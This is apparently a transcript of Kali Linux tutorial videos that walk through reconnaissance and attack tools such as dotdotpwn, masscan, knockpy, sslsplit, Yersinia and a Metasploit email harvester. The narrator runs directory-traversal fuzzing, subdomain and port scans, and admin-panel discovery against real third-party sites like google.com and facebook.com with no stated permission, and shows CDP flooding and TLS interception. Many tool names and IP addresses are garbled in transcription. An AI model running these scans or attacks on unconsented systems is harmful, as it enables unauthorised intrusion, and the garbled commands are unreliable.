robtext.com, 40guard.com, unshortened.me, urlwide.com, labs.alienvault.com, threatexpert, vxvault, and virustotal. Let's open up terminal, type automator space -h, a IP and URL analysis tool. Here you can see that basic syntax automator.py -h -o output -w web -c csv -d delay -s source -p -proxy -a user agent target IP URL and hash passive analysis tool. Positional arguments target list one IP address, URL or hash to query or pass the file name of a file containing IP address info, URL or hash to query each separated by a new line. Let's see optional arguments. -h, that is help, shows this help message, and exit -o output file. This option will output the result to a file and so on. Let's do run automator against a target IP, hash, URL or file. Simply type automator space google.com. Here you can see that Google IP address 216.58.209.238, country United States. It will analyze on different directories on DNS malicious URLs. You can check on any websites. Let's try it using MD5 encryption data. Here you can see that it results for 44A6A and so on. It will detect with different malwares. So that's it in this video on automator. Thank you for watching this video. Welcome. In this video we are going to learn .pwn information gathering tool in Linux. It's a very flexible, intelligent fuzzer to discover traversal directory vulnerabilities in software such as HTTP, FTP, TFTP, servers, web platforms such as CMSS, ERPS, blogs, etc. Also, it has protocol-independent module to send desired payload to the host and port specified on the other hand. It also could be used in scripting way using stdout module. It's written in Perl programming language and can be run either under Unix or Windows platform. It's the first Mexican tool included in Backtrack Linux, which is nowadays improved version is called as Linux, which we are using. Fuzzing module supported in the version HTTP, HTTP URL, FTP, TFTP, payload, stdout. Let's open up terminal and type .pwn.pl. Here you can see that basic syntax .pwn.pl -m module -h host options. Let's see the .pwn tool options -m module, that is HTTP, HTTP URL, FTP, TFTP, payload, stdout, -h host name, -o operating system detection for intelligent fuzzing, and so on. Use the HTTP scan module, that is -m HTTP against a host, that is -h 172.217.26.174 is a Google IP address using the get method, that is -m get. So basically type .pwn.pl -m HTTP -h 172.217.26.174 -m get. Here you can see that the target information, host name 172.217.26.174, protocol HTTP, port 80. Here we can see that it is testing with different directory traversal fuzzer. If HTTP status is 404 not found the directory, here I am using google.com. This will traversal test with total 19,680. So that's it in this video on .pwn information gathering tool. Thank you for watching this video. Welcome. In this video, we are going to learn Collisimero, which is information gathering tool in Linux. Collisimero is an open source framework for security testing. It is currently geared towards web security, but it can easily be expanded to other kinds of scans. The most interesting features of the framework are real platform independence that is tested on Windows, Linux, BSD, and OS X. No native library dependencies. All of the framework has been written in pure Python. Good performance when compared with other frameworks written in Python and other scripting languages. Very easy to use. Plugin development is extremely simple. The framework also collects and unifies the result of well-known tools SQLmap, XSR, OpenVS, DNSRecon, the Harvester, integration with standard CWE, CVE, and OWASP. Designed for cluster deployment in mind, let's open up terminal and type Collisimero -h. Here you can see that the basic usage of Collisimero tool, collisimero.py command, targets, -options. Let's see the options. Scan, perform a vulnerability scan on the given targets. Optionally import result from other tools and write a report. The arguments that follow may be domain names, IP addresses, or web page. Profiles show a list of available config profiles. This command takes no arguments. Info show detailed information on a given plugin. The arguments that follow are the plugin IDs. You can use globe style wildcards. Report, write a report from an earlier scan. This command takes no arguments to specify output file. Use the -o switch and so on. Let's run a vulnerability scan against the target host. biblehistory.com, type Collisimero scan, biblehistory.com. Here you can see Collisimero is started. The target IP 54.201.8.54, target host name biblehistory.com, target port 80, DNS zone transfer failed, server biblehistory.com not vulnerable. For DNS brute forcer, it will take few minutes. Here I am forwarding. So that's it in this video on Collisimero, information gathering tool in Linux. Thank you for watching this video. Welcome. In this video, we are going to learn Netmask, which is information gathering tool in Linux. Netmask is another simple tool which does one thing, and that is makes a ICMP netmask request. By determining the netmask of various computers on a network, you can better map your subnet structure. Let's open up netmask application, Linux information gathering, route analysis, netmask. Or open terminal and type netmask -h. This command open with the help option, basic usage of netmask, netmask spec -v version prints version number, -d debug print status progress information, and so on. A specification can be any of the address, address colon address, address colon plus address, address or a mask, so on. Let's output address or a netmask pairs in hex. Type netmask -x google.com. Here you can see that address and netmask in hex format. Type netmask -o google.com. Here you can see that address and netmask in octal format. Let's see in binary format. Type netmask -b google.com. Here you can see that address and netmask in binary format. So that's it in this video on netmask information gathering tool in Linux. Thank you for watching this video. Welcome. In this video, we are going to learn NOC subdomain scanner, which is information gathering tool in Linux. NOC is another Python-based subdomain discovery tool which is tested with Python 2.7.6 version. Here I wrote github downloading zip installation command, copied it up, and let's open terminal. Now I'm going to change directory to desktop. This is not mandatory, you can use any directory. Paste the command. Here you can see that Knock installation is started. You can see that successfully installed NockPy 4.0. Type NockPy space -h. Here you can see that basic syntax NockPy -h -v -w word list -r -c -g and domain. The optional argument, which is -h help, shows this help message, and exit -v version, show program's version number, and exit -w word list, specific path to the word list file. Here you can see that some of the basic example. Let's scan google.com subdomains. Type knockpy space google.com. Here you can see that scanning is started. It is displaying with IP address status. Type domain name headers. Here I will show you output exporting in JSON format. Stop the Google subdomain scan. Type Ctrl+C. Type knockpy space -j space facebook.com. Facebook subdomain scan is started here. Here you can see that JSON report saved in facebook_com 149 so on .json file. Let's open it. We see that JSON format Facebook domain is extracted here. So that's it in this video on Knock subdomain scanner information gathering tool in Linux. Thank you for watching this video. Welcome. In this video we are going to learn load balancing detector, which is information gathering tool in Linux. LBD or load balancing detector, it detects if a given domain uses DNS or HTTP load balancing. Let's open up terminal and type LBD. Here you can see that basic syntax LBD space domain port HTTPS. Test to see if the target domain is using a load balancer. Type lpd space google.com. LBD tool check load balancing with different methods. Here checking for DNS load balancing is not found. Server is also not found. Now LBD tool is checking for HTTP load balancing via date is not found. Here you can see that checking load balancing via method HTTP is found. Now let's try with another vulnerable website xyz.com, which is anonymous website. Type xyz.com. Here you can see that xyz HTTP load balancing different found xcool 31.239 xcool 31.219. So that's it in this video on load balancing detector in information gathering tool in Linux. Thank you for watching this video. Welcome. In this video we are going to learn Angry Fuzzer information gathering tool in Linux. Discover hidden files and directories on a web server. The application tries to find URL relative paths of the given website by comparing them with the given site. Features: fuzz URL set from an input file, concurrent relative path search, configurable number of fuzzing workers, fuzz CMS, that is WordPress, Drupal, Joomla, generate reports of the valid paths. Let's open up terminal, type cd space desktop, change root directory to desktop. Let's download the angryfuzzer.git file. Type git space clone https github.com hebski angryfuzzer.git. Here you can see that cloning is started. Receiving object is 100% done. Now change the terminal directory to angryfuzzer directory. Type cd space angryfuzzer. Type ls to see the files and subdirectories. We can see that angryfuzzer.py. Let's run the angryfuzzer.py Python file. Type python space angryfuzzer.py. Here you can see that basic syntax as python angryfuzzer.py space -h. The options are -h show help message, -q for quit silent mode, -u for URL, and so on. Let's open a browser and open hacking2.com. Let's scan the hacking2.com using angryfuzzer tool. It will check with some of the random file names and directory names. Type python space angryfuzzer.py space -u http hacking2.com space --cms space wp. Here you can see that in green font, reports valid paths for files and directories in hackingtude.com in red not found. So that's it in this video. Thank you for watching this video. Welcome. In this video we are going to learn Miranda information gathering tool in Kali Linux. Miranda is a Python-based universal plug-and-play client application designed to discover, query, and interact with UPnP devices, particularly Internet Gateway devices like routers. It can be used to audit UPnP-enabled devices on the network for possible vulnerabilities. Some of its features include interactive shell with the tab completion and command history, passive and active discovery of UPnP devices, customizable msearch queries, full control over application settings such as IP addresses, ports, and headers, simple enumeration of UPnP devices, services, actions, and variables, correlation of input or output state variables with service actions, ability to save data to file for later analysis and collaboration, command logging. Miranda was built on and it is meant for Linux system and has been tested on Linux 2.6 kernel with Python 2.5. However, it is written in Python. Most functionality should be available for any Python supported platform. Miranda has been tested against IGTs from various vendors including Linksys, D-Link, Belkin, and Action Tag. All Python modules came installed by default on Linux Mint 5 test system. Let's open up terminal, type Miranda UPnP administration tool. Here you can see that basic usage, that is Miranda space options. Let's see basic options for Miranda tool. -s, struct file, load previous host data from struct file, -l, log user supplied commands to log file, -i, specify the name of interface to use, and so on. Let's start on interface eth0 in verbose mode, then start discovery mode. For that, type Miranda interface eth0, that is -i eth0 in verbose mode, so -v. For discovery mode, type msearch. Here you can see that tool entering in discovery mode for UPnP root device. You can click Ctrl+C to stop. It'll take few minutes. I'm forwarding this video. Here we get response as SSDP notification from 192.168.0.6, port number 2869. Let's copy the XML file link, paste it in URL. Here we can see that udhi XML file. So that's it in this video on Miranda information gathering tool in Kali Linux. Welcome. In this video we are going to learn NCAT. It's an information gathering tool in Kali Linux. NCAT or Netcat is a feature-packed networking utility which reads and writes data across networks from the command line. NCAT was written for the Nmap project and is a culmination of currently splintered family of Netcat incarnations. It is designed to be a reliable backend tool to instantly provide network connectivity to other applications and users. NCAT will not only work with IPv4 and v6 but provides a user with virtually limitless number of potential users. NCAT is also known as Swiss Army knife. We can write NCAT or NC while running the command options. So don't be confused if I will use different name for NCAT. Simply we can understand what Netcat does. It opens the connection between two machines and give back two streams. Let's open the terminal and type ncat space -h. You can see that NCAT version 7.48, basic usage of Netcat, NCAT options host name, port, options taking a time, assume seconds, append ms for millisecond, s for second, n for minutes, and h for hours. Let's see the options. -4 use IPv4 only, -6 use IPv6 only, -u -Unix SOC use Unix domain sockets only. Let's listening on any TCP or UDP port will learn to act as any server with ncat. Let me clear you some command option which we are going to use here. -L option will help it work in listen mode. -P option will mention which port to listen. -V option will make it interactive on Linux server, and the syntax is ncat -lvvp space port. So let's type ncat space -lvvp space 25. Here we can see that ncat version 7.4 listening on 0.0.0.025. So that's it in this video on ncat information gathering tool. Thank you for watching this video. Welcome. In this video we will see WAF W00F information gathering tool in Linux. WAF W00F identifies and fingerprints web application firewall products. How does it work? To do its magic, WAF W00F does the following: sends a normal HTTP request and analyzes the response. This identifies a number of WAF solutions. If that is not successful, it sends a number of HTTP requests and uses simple logic to deduce which WAF it is. If that is also not successful, it analyzes the responses previously returned and uses another simple algorithm to guess if a WAF or security solution is actively responding to our attacks. It detects a number of WAFs. To view which WAFs it is able to detect, run WAF W00F with a -L option. At the time I did, the output is as follows. WAF W00F allows one identify and fingerprint WAF products protecting a website. Let's open up WAF W00F tool, application, IDS or IPS identification, WAF W00F. Basic usage or syntax WAF W00F, URL1, URL2, URL3. For example, WAF W00F, http www.victim.org. Here you can see that the options are -H for help, -V for purpose, and so on. Let's type WAF W00F www.outlook.com. Here we found a firewall detection on our target website. Reason: the server is different when an attack is detected. Let's type WAF W00F www.google.com. Here we could not find any firewall detection. So that's it in this video on WAF W00F information gathering tool in Linux. Thank you for watching this video. Welcome. In this video we will see Info Finder. It's an information gathering tool in Linux. Info Finder is a tool to collect information of any domains pointing at some server. It is able to detect all domains pointing to an IP address and detect CMS version installed in the web like WordPress, Joomla, PrestaShop, etc. Also is able to detect PHP version, web server version, Plesk version. Let's open the browser and go to https://github.com ggusoft/info or finder link. Copy the git link. Open up terminal. Here I will change terminal directory to desktop. Type cd desktop. Let's download the Info Finder tool. Type git clone and paste the copied link. Here you can see that cloning is started. Let's change terminal directory to cloned Info Finder directory. Type cd space Info Finder /. Here we can see that infofinder.py Python file. Let's run the file. Type ./infofinder.py to run Infofinder. Here you can see that Infofinder basic usage.
Let's see commands -d domain gets a domain for apply any optional commands. -d capital D gets a domain list hosted in IP or specified domain. -d capital I gets a domain list hosted in specified IP, and so on. Let's see optionals. Infofinder -cms checks if every domain found has a CMS website and shows version. -ser info checks web server parameter. -subdomain -enum lists subdomain of every domain found. Now type ./infofinder.py -d capital I 107.180.54.186 space -cms -di gets AB domain list hosted in specified IP. -cms checks if every domain found has a CMS website and shows version. Let's see the subdomain enum. Type ./infofinder.py space -d capital I 107.180.54.186 space -subdomain -enum. Here you can see that subdomain -enum lists. So that's it in this video on Infofinder information gathering tool. Thank you for watching this video. Welcome. In this video we are going to learn Mascan, which is information gathering tool in Linux. It is the fastest internet port scanner. It can scan the entire internet in under 6 minutes, transmitting 10 million packets per second. It produces results similar to Nmap, the most famous port scanner. Internally, it operates more like ScanRand, Unicorn Scan, and Zmap, using asynchronous transmission. The major difference is that it's faster than these other scanners. In addition, it's more flexible, allowing arbitrary address ranges and port ranges. Note, Mascan use a custom TCP or IP stack. Anything other than simple port scan will cause conflict with the local TCP or IP stack. This means you need to either use the -s option to use a separate IP address or configure your operating system to firewall the ports that Mascan uses. Let's open up terminal and type Mascan, a synchronous TCP port scanner. Here we can see that the basic syntax: Mascan -p80 8000 to 8100 10.0.0.8 rate equals to 10,000. Scan some web ports on 10.x.x at 10 kbps. Let's copy the basic usage example and paste it. Here you can see that it will scan all the subnetting 8 URL. Here you can see that 1242 URLs are found. Click on Ctrl plus click. Let's try it on router IP address. Type Mascan -p80 443 192.168.0.1 24 rate 10,000. Here you can see that it will discover to address with open port 80 TCP. Scan for a selection of ports -p80224443 across a given subnet, that is 107.180.54.186.24. That is type Mascan -p80443 space 107.180.54.186.24 rate equals to 10,000. Here you can see that Mascan discover open port 80,443 ports. So that's it in this video on Mascan information gathering tool in Linux. Thank you for watching this video. Welcome. In this video we will learn Faraday information gathering tool in Linux. Faraday introduces a new concept, IPE, that is Integrated Penetration Test Environment.
a multi-user penetration test IDE designed for distribution, indexation, and analysis of the data generated during a security audit. The main purpose of Faraday is to reuse available tools in community to take advantage of them in a multi-user way. Designed for simplicity, users should notice no difference between their own terminal application and the one included in Faraday. Developed a specialized set of functionalities that help users improve their own work. If you remember yourself programming with an IDE like Eclipse, then well, Faraday does the same as an IDE does for you when programming, but from the perspective of a penetration test. Let's do some practical. Let's open up terminal and type Python Faraday. Collaborative penetration test IDE. Here we can see that usage syntax Faraday.py inside the bracket -h -px port -pr port RAST -d. Faraday launcher parser optional arguments -h -h show the options -disable exception, disable the application hook that allows to send error reports to developers, and so on. Connections options are -n host -host name, host the host name where both server API will listen, -px port _xmlrpc -port -xmlrpc port _xmlrpc sets the port where the API XMLRPC server will listen, and so on. Profiling option -profile enables application profiling. When this option is used, -profile -output and -profile -depth can also be used, and so on. Let's open up Faraday graphical user interface. Faraday is a graphical user application that consists of ZSH terminal and a sidebar with details about your workspaces and hosts. Type Python -Faraday. You can see that Faraday 2.4.0 graphical application is opened. Type in Faraday console as Nmap -a 127.0.0.1. The Nmap, a network mapper, is an open source and a very versatile tool for Linux system or network administrator. Nmap is used for exploring networks, perform security scans, network audit, and finding open ports on remote. When the Faraday supports the command you are running, it will automatically detect it and import the results. In the example we will see now, the original Nmap command that was entered was Nmap -a 127.0.1, which Faraday converted on the fly. Here you can see that 9876 TCP port is scanned, the state is opened. Double-clicking on the host under the host tab will open up details about the host, its services, and any vulnerabilities that were detected. HTTP server header, you can see that OS Linux 3.x to vulnerabilities information is base HTTP 0.3 Python 2.7.13. Back to Faraday console, you can create new workstation clicking on a workstation tab. Here I created workstation as a methodar. Faraday also includes a full-featured web interface that provides you, your team, and any other interested parties with an immense amount of information. Here you can see that web interface. The recent activity shows in activity feed. We can see that one vulnerability, HTTP server header, and so on. Take a look in the user /share /python Faraday /plugins /repo directory to see what other applications Faraday supports. Type ls. Here you can see that the list of applications Faraday supports. So that's it in this video on Faraday information gathering tool in Linux. Thank you for watching this video. Welcome. In this video we are going to learn TLSSS, LED, and SSL split information gathering tool in Linux.
Let's see about TLSS-LED package first. TLSS-LED is Linux shell script whose purpose is to evaluate the security of a target SSL or TLS web server implementation. It is based on SSL scan, a thorough SSL or TLS scanner that is based on OpenSSL library and on the OpenSSL S client command line tool. The current tests include checking if the target supports the SSL v2 protocol, the null cipher, weak cipher based on their key length, the availability of strong ciphers, if the digital certificate is MD5 signed, and the current SSL or TLS renegotiation capabilities. Let's open up TLSS-LED, go to Application, Information Gathering option, SSL Analysis, TLSS-LED, or open terminal and type TLSS-LED. Here we can see that syntax of TLSS-LED tool, that is user bin TLSS-LED, hostname or IP address, space port. Let's check SSL TLS on the host and port. Now go to Windows Desktop, open up command prompt, type ipconfig. Here you can see that IP address. Let's go back to Kali, type TLSS-LED 192.168.0.5 TLS LED tool is checking on 192.168.0.5 IP address 443 port. Here you can see that processing start, analyzing SSL or TLS on our target machine. We can see that SSL scan is running on 192.168.0.5 machine 443 port. This tool is checked with SSL scan, MITM vulnerability, that is man-in-middle attack vulnerability, client authentication using digital certificate, and so on. Here you can see that final output as a new file is created in output directory TLSS-LED 1.3 192.168.0.5 443 20170612 and so on. So that's it in TLSS-LED tool. Next we are going to learn SSL split tool in Kali Linux. SSL split package. SSL split is a tool for man-in-the-middle attacks against SSL or TLS encrypted network connections. Connections are transparently intercepted through a network address, translation engine, and redirected to SSL split. SSL split terminates SSL or TLS and initiates a new SSL or TLS connection to the original destination address. While logging all data transmitted, SSL split is intended to be useful for network forensic and penetration testing. SSL split supports plain TCP, plain SSL, HTTP and HTTPS connection over both IPv4 and IPv6. For SSL and HTTP connections, SSL split generates and signs forged X509v3 certificate on the fly based on original server certificate subject DN and subject alt name extension. SSL split fully supports server name indication and is able to work with RSA, DSA and ECDSA keys and DHE and ECDHE cipher suites. SSL split can also use existing certificate of which private key is available instead of generating forged ones. SSL split supports null prefix CN certificates and can deny OCSP request in a generic way. SSL split removes HPKP response headers in order to prevent public key pinning. Let's open up terminal, type SSL split space -headers. Here you can see that different option of SSL split tool. Here we can see that the basic syntax of SSL split option proxy spaces. Here you can see that SSL split options are -c prem file, use CA cert from PEM file to sign forged certs, -k PEM file, use CA key from PEM file to sign forged certs, -c PEM file, use CA chain from PEM file, -k pem file use key from pem file for leaf search, and so on. Here you can see that the syntax and example of SSLsplit in console. SSLsplit space -k ce.key ce.pen -p https 127.0.0.1 8443 https 18443. Run in debug mode. Log the connection, that is -l. Set the cron jail, that is -j. Save files to disk, that is -s. Specify the key, that is -k ca.key. Specify the cert, that is ca.crt. Specify SSL, that is SSL. Configure proxy, that is 127.0.0.1 8443, and TCP. So that's it in this video on TLSS LED and SSLsplit information gathering tool in Linux. Thank you for watching this video. Welcome. In this video we are going to learn Dimitri, information gathering tool on Linux. Dimitri stands for Deep Magic Information Gathering Tool. It's a Unix or Linux command line application coded in C. Dimitri has the ability to gather as much information as possible about a host. Base functionality is able to gather possible subdomains, email addresses, uptime information, TCP port scan, whois lookups, and more. Following is a list of current features: an open source project, perform an internet number whois lookup, retrieve possible uptime data, system and server data, perform a subdomain search on a target host, perform an email address search on a target host, perform a TCP port scan on the host target, a modular program allowing user-specified modules. Let's open up application, information gathering, Dimitri. Here we can see that the different option, -o to save output, -i to perform whois lookup on IP address of the host, -w to do whois lookup on the domain name of the host, -n to retrieve netcraft.com information on a host, -s perform a search for possible subdomains, -e perform a search for possible email address, -p perform a TCP port scan on a host, and so on. Just read it, you will get it. Now let's try with Dimitri tool option. Let's open up another terminal and type Dimitri space -o space google.com. After typing Dimitri -o google.com, it will give out some results. It is saying retrieving netcraft.com information for google.com. Please to wait. You can see the information, it has already connected. Send C, net name, and net num. It will take time. It is saying gather subdomain information for google.com. Searching google.com for 80. Let me fast forward this, it will take time. Here I'm just fast forwarding the video. It found nothing, that is 0 possible subdomains. Gathered email information for google.com, nothing. Now it's going for gather TCP port information for 172.217.262.06. It has got 80 TCP port open. Basically got nothing. So let me give one more try. By using different option, I will use Dimitri -i google.com and press enter. We got some information for -i. Let me check out what all we got. Got some website. Not that useful. Let me try some other option, that is -w to perform whois lookup on domain name of a host. I hope we get some information here. Yeah, we got some little information here. The registrar is Mark Monitor Incorporate and some DNS servers. Can see these are all the options. We have to try one after the other to get what all information we can retrieve using this Dimitri tool. Now I will use -F to perform TCP port scan, showing all the ports filtered and so on. So that's all. It will show filtered or unfiltered or open. So this much useful is this tool. Just use all the options to obtain information regarding the host like I did for different domain, different output, and you'll get to learn different things about the domain. So that's all. Thank you for watching this video. Welcome. In this video we are going to learn URL Crazy. It's an information gathering tool on Linux. Generate and test domain typos and variation to detect and perform typo squatting, URL hijacking, phishing, and corporate espionage. Features: generates 15 types of domain variants, knows over 8,000 common misspellings, supports cosmic ray induced bit flipping, multiple keyboard layouts, checks if a domain variant is valid, test if domain variants are in use, estimate popularity of a domain variant. You can open URL Crazy by going to Application, Information Gathering Options, DNS Analysis, URL Crazy, or open Terminal and type URL Crazy. Here you can see that URL Crazy tool options, that is -K for keyboard layout, -V for popularity, that is check domain popularity with Google, -R do not resolve DNS, -I show invalid domain names, -F for format type, human readable or CSV, -O for output file, -H for help, -V to print version information. Now let's type URL Crazy hacking2.com. Lots of output we got. One that is on host name to process, keyboard QWERTY, character repeat, character insertion, bit flipping, wrong TLD, and so on. Lots of information we can observe here, as I had described in beginning of the video. Now let's popularity. So I will type URL Crazy -P hacking2.com. Can observe the output for popularity. Nothing we got. Character omission, character spam. Basically we got nothing, to be frank. Let's go for another option, that is -I, where -I stands for show invalid domain names. We'll try on google.com. Here you can see we got some valid is true or not. Google.com is valid. Google.co is not, false, and so on. Validity true or false for all that kind of domain. That is google.com. Now let's try -V for google.com, where -V means print version information. Here we got it is on host names to process. We got no such information on version here, to be frank. Okay, that's it. You can try all those options. If it is applicable to that website, means that option will show up, or else it will not. That's it about URL Crazy information gathering tool on Linux. Thank you for watching this video. Welcome. In this video we will learn Find Admin Panel Finder, Linux Python script. Let's open up the browser and open Google search, type Admin Panel Finder Python script, click on github.com site link. You can see that the Python script. Now let's download zip file. Now drag it to the desktop and unzip it. Let's open up the terminal, type ls, Here we can see that all folders and files. Now select desktop, type cd desktop. Let's see the desktop files and folders. Type ls. Here you can see that admin panel finder master folder is presented. Type cd admin panel finder master. Type ls see all files. Now let's run admin panel finder.py python file. Type python admin panel finder. Here we get to enter site name. Let's type www.facebook.com. Here you can see that available link, that is facebook.com index, facebook.com login.php, control panel, login, admin.html, admin item, manager. It will take time. I'm just fast forwarding this video. So manager, system admin, superman, control, cp, manage, sign in, my admin, administrator, web admin, administrivia, pg admin, direct admin, star admin, and so on. So in this way it finds admin panel of website. Let me fast forward this video. It will not stop, so it keep on going. If you want to stop, just press Ctrl+C. So that's all in this video on Find Admin Panel Finder. Thank you for watching this video. Welcome. In this video we are going to gather email addresses using MSF console Linux. Let's open up terminal and type MSF console. MSF console is opened here. Type use gather or search email collector. This tool is used to search email from server Google, Yahoo, Bing, etc. Type show options. Here you can see that options, domain name to locate email address. Let's set domain name as so-and-so.com, whatever it may be. So I'll type set domain and the domain name, that is so-and-so.com. Let's set output file as email.txt. Type set out file space /root/email.txt. Now exploit it. Type exploit. Here we can see that two emails are created from so-and-so.com website. You can see that email.txt file mails are extracted from that website. Now let's try it on gmail.com. Let's set domain name as gmail.com. Type set domain gmail.com. Here you can see that 6 mails are grabbed from gmail.com website. So that's it in this video on gathering email address using MSF console in Linux. That's all. Thank you for watching this video. Welcome. In this video we will see DNS tool. We'll learn how to use DNS tool that Kali has incorporated. Basically these tools help in zone transfer or domain IP resolving issues. Enumeration is a process that allows us to gather information from a network. DNS enumeration and SNMP enumeration techniques. DNS enumeration is the process of locating all DNS server and DNS entries for an organization. DNS enumeration will allow us to gather critical information about the organization, such as usernames, computer names, IP addresses, and so on. To achieve this task, we will use DNS enum. For SNMP enumeration, we will use a tool called SNMP enumeration. SNMP enumeration is powerful SNMP enumeration tool that allows user to analyze SNMP traffic on the network. First, let's see theory on that, and then practical, and then again theory, and then again practical. The first tool is dnsenum.pl, which is Perl script that helps to get MX, A and other record connect to a domain. There are some additional options we can use using DNS enum. For that, first open up terminal, I'll type dnsnm google.com. The result we got is we got host address, that is google.com 172.72, and name server ns1, ns4, ns3, and so on, and their IP addresses and their DNS addresses, and behind that mail servers. It's trying zone transfer and getting bind version. It's not possible, and it's over. So we got three basically output, that is host address, name server, mail X server, and zone transfer and getting bind version we were unable to get. There are some additional option we can run using dnsnm, that is -thread. -thread allows you to set how many processes will run at once, and -r allows you to enable recursive lookups. -d allows you to set the time delay in second between whois request, and -0 allows us to specify the output location. -w allows us to enable whois queries. Use this option to get to know what that all means. Now let's move on to second one, that is Nmap. Nmap helps to find the phone numbers, contacts, and other subdomain connected to this domain that we are searching. So for that, I will type dnsmap google.com and hit enter. DNS network mapper has begun. It's giving information as IPv6 address, PV6 address, accounts.google.com, admin.google.com, and so on. It's just going on. So these are the IP addresses and IPv6 addresses. I just stopped it by pressing Ctrl+C as it was giving lots more information. Do try this for different domains to get what all information you can collect from Nmap. The third tool is DNS Tracer. Gets its information from a given host name. I will type DNS Tracer google.com. As I said before, it determines where a given domain name server gets its information from a given host name. So these are that: ns3, ns1, ns4.google.com, and DNS address got authoritative answer. So that's all in DNS tools in Kali Linux. Thank you for watching this video.
Welcome. In this video we are going to learn Nmap server and Nmap client in Kali Linux. Nmap is a framework to distribute Nmap scans among several clients. It reads an already created file with Nmap commands and sends those commands to each client connected to it. The framework uses a client or server architecture. The server knows what to do and the clients to do it. All the logic and statistics are managed in the server. The Nmap output is stored on both server and client. Usually you would want this if you have to scan a large group of hosts and you have several different internet connections. Let's open up terminal and type user bin dnmap server. The options -f, nmap commands, nmap command file, -p, port, TCP port where we listen for connections, and so on. Create a text file containing the nmap commands that the clients will run. Pass the file commands.txt to start the server. Here I wrote nmap commands on localhost IP address 192.0.0.1 and saved as commands.txt. Type user bin dnmap _server -f commands.txt. Here you can see that the number of online clients for localhost is 0. Open up another terminal and type if config IP address 192.168.154.132. Type user bin dnmap _client distributed nmap framework client. Here you can see that the basic usage for user bin dnmap client. Options -s server IP address of dnmap server, -p server port of dnmap server, dnmap port defaults to 46001, and so on. Let's connect to the server at 192.168.154.132 -s using the alias dnmap client 1. -a type user bin dnmap client -s 192.168.154.132. Here you can see that client is connected successfully. That's it in this video. Thank you for watching this video. Welcome. In this video we will see service enumeration. Enumeration is a process that allows us to gather information from a network. DNS enumeration and SNMP enumeration techniques. DNS enumeration is a process of locating all DNS servers and DNS entries for an organization. DNS enumeration will allow us to gather critical information about the organization, such as usernames, computer names, IP addresses, and so on. To achieve this task, we will use DNS-enum. For SNMP enumeration, we'll use a tool called SNMP enumeration. SNMP-enum is a powerful SNMP enumeration tool that allows users to analyze SNMP traffic on a network. Now let's start practical on service enumeration. We will utilize DNS-enum for DNS enumeration. To start a DNS enumeration, let's open up the terminal and type ls. So these are the directories. On root, let's navigate to the different directory, that is bin. For that, cd, that is change directory, user, bin, and hit enter. Now let's type ls to list the files. So these are all the files. Let's search for DNS-enum. Scroll down. So here we got, here is DNS-enum, which we want. Now I will type ./DNS-enum -enum and copy target website URL and paste it here. I'm using Bible history and press enter. You can see it's specifying the DNS information of the host site here. The whois IP module, query disabled, Bible history, DNS host address, name servers, mail servers, zone transfer didn't happen, scrapping subdomains from Google for Bible history is not possible because it basically has no subdomain. If your target website has subdomain, it would have listed. Now let's come back to the root by typing cd ... Now in root, let's try this DNS-enum. DNS-enum space --enum and paste the URL. It gives the same result. So basically you can change directory and go to the bin and use it, or else you can use it in the root itself only. I have just navigated to bin to just show that where that DNS-enum is present. So that's all in service enumeration. Thank you for watching this video. Welcome. In this video we will see Ersinia tool in Linux. In this tool, spanning tree protocol, inside that, sending raw configuration BPDU, sending raw TC and BPDU, DOS sending raw configuration BPDU, DOS sending raw TC and BPDU, claiming root role, dual home MITM, that is man in middle attack, then Cisco discovery protocol, that is sending raw CDP packet, DOS flooding CDP neighbors table, setting up a virtual device, dynamic host configuration protocol, that is sending raw DHCP packet, DOS sending discovery packet, setting up rogue DHCP server, DOS sending release packet, hot standby router protocol, in that sending raw HSRP packet, becoming active router MITM, dynamic trunking protocol, sending raw DTP packet, enabling trunking, 802.1q, sending raw 802.1q packet, sending double encapsulated 802.1q packet, sending 802.1q ARP poisoning.
802.1x sending raw 802.1x packet, MITM 802.1x with two interfaces, LAN trunking protocol that is sending raw VTP packet, deleting all LANs, deleting selected LAN, adding one LAN, get list crash. Now let's do some practical. So let's open up terminal and type Yersinia space -h. Here you can see that basic syntax Yersinia -hvgidd -l log file -c config file protocol options. The basics option for Yersinia tool. Their options can help analyze the vulnerability you want, that is -v program version, -h help screen, -g graphical mode, -i interactive mode, and so on. Type Yersinia space -v. Here you can see that version Yersinia tool as 0.7.3. Type Yersinia space -i. Here you can see that interactive mode for Yersinia tool. Let's open up another terminal to see graphical mode for Yersinia tool. Type Yersinia space -g. Here you can see that graphical mode for Yersinia tool. Let's see the protocols this tool support. You can see that CDEP, DHCP, 802.1q, 802.1x, DTP, HSRP, ISL, MPLS, SDP, VTP. Let's open up the file. For that file, open etcher.conf, click on launch button. Here I choose VTP attack. Here you can see that in VTP tab, 03 request code, ETH0 interface. Now let's attack using CDP, flooding CDP table. Here you can see that the attack is started with different dev ID. So that's it in this video on Yersinia tool in Linux. Thank you for watching this video. Welcome, in this video we will learn OScanner in Linux. OScanner is an Oracle assessment framework developed in Java. It has a plugin-based architecture and comes with couple of plugins that currently do aside enumeration, password test that is common and dictionary, enumerate Oracle version, enumerate account roles, enumerate account privileges, enumerate account hashes, enumerate audit information, enumerate password policies, enumerate database links. And the syntax is OScanner space -s, IP -r, repository files, space options. Let's do this in practical. Let me open up the terminal and type OScanner. The options -s server name, -f server list, and so on. Let's open victim machine bbox. Here we can see that 192.168.154.129. Now let's get back to Linux. Scan the target server on port 1040. For that, type OScanner the target server, that is -s 192.168.154.129, and on port 1040, so -p 8080. Here you can see that it will scan the target server. So that's it in this video on OScanner package in Linux. Thank you for watching this video. Welcome, in this video we will learn securing communications with secure shell in Linux. To minimize the detection by a target network during testing, Kali does not enable any external listening network services. Some services such as Secure Shell, that is SSH, are already installed. However, they must be enabled prior to use. Kali comes pre-configured with default SSH keys. Before starting the SSH service, it's a good idea to disable the default keys and generate a unique key set for use. Move the default SSH keys to backup folder and then generate a new SSH key set using dpkg-reconfigure open SSH-server. the process of moving the original keys and generating the new key set. So let's open up the terminal and type cd/etc/ssh. Let's make the directory as keys using mkdir command. Type mv space ssh underscore host underscore star space keys. Now generate a new SSH key set. Type dpkg -reconfigure space OpenSSH -server. To verify that the newly generated keys are unique, calculate their MD5 sum hash values and compare with the original keys. Type MD5 sum space SSH -host -star. Now let's change the terminal path as keys directory. Type cd keys. Let's type MD5 sum space star. To start the SSH service using the menu, select Applications, Linux, System Services, SSHD start. Now I'm starting SSH from the command line using console. Type etc/init.d/ssh space start. To verify that SSH is running, perform a netstat query. So type netstat space -antp. Here we can see that the SSH daemon is listening on port 22 and so on. To stop SSH, type etc/init.d/ssh space stop. So that's it in securing communication with Secure Shell in Linux. 